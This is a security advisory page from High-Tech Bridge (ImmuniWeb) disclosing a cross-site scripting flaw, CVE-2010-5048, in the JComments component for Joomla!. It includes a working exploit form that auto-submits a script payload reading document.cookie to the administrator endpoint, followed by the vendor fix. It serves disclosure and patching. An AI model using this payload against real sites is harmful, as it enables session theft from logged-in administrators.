Total Tests:

Cross-site Scripting (XSS) Vulnerability in JComments Component for Joomla!

Advisory ID:HTB22368
Product:JComments
Vendor:JoomlaTune .com
Vulnerable Versions:2.1.0.0 [07/08/2009] and probably prior
Tested Version:2.1.0.0 [07/08/2009]
Advisory Publication:May 4, 2010 [without technical details]
Vendor Notification:May 4, 2010
Public Disclosure:May 18, 2010
Latest Update:May 16, 2010
Vulnerability Type:Cross-Site Scripting [CWE-79]
CVE Reference:CVE-2010-5048
Risk Level:Low
CVSSv2 Base Score:2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Solution Status:Fixed by Vendor
Discovered and Provided:High-Tech Bridge Security Research Lab
 

Advisory Details:

High-Tech Bridge SA Security Research Lab has discovered vulnerability in JComments component for Joomla! which could be exploited to perform cross-site scripting (XSS) attacks.

1) Cross-site scripting vulnerability in JComments: CVE-2010-5048
The vulnerability exists due to input sanitation error in the HTTP POST parameter "name" in admin.jcomments.php. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website. Successful exploitation requires that victim is logged in into the website and has access to the vulnerable script.
Exploitation example:
<form method="POST" action="http://host/administrator/index.php" name="main">
<input type="hidden" name="name" value='ComntrName"><script>alert(document.cookie)</script>'>
<input type="hidden" name="email" value="example@example.com">
<input type="hidden" name="comment" value="comment text">
<input type="hidden" name="published" value="1">
<input type="hidden" name="option" value="com_jcomments">
<input type="hidden" name="id" value="1">
<input type="hidden" name="task" value="save">
</form>
<script>
document.main.submit();
</script>

How to Detect Cross-Site Scripting Vulnerabilities
Website Security Test
  • GDPR & PCI DSS Test
  • Website CMS Security Test
  • CSP & HTTP Headers Check
  • WordPress & Drupal Scanning
Try For Free

Solution:
Upgrade to version 2.2.0.0 or later.


References:
[1] High-Tech Bridge Advisory HTB22368 - https://www.immuniweb.com/advisory/HTB22368 -
Cross-site Scripting (XSS) Vulnerability in JComments Component for Joomla!
[2] JComments - http://www.joomlatune.com/jcomments.html - The JComments allows to website visitors to leave comments to any published materials.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.

Have additional information to submit?
Please feel free to send us any additional information related to this Advisory, such as vulnerable versions, additional exploitation details and conditions, patches and other relevant details.
Book a Call Ask a Question
Close
Talk to ImmuniWeb Experts
ImmuniWeb AI Platform
Have a technical question?

Our security experts will answer within
one business day. No obligations.

Have a sales question?
Email:
Tel: +41 22 560 6800 (Switzerland)
Tel: +1 720 605 9147 (USA)
*
*
*
Your data will stay private and confidential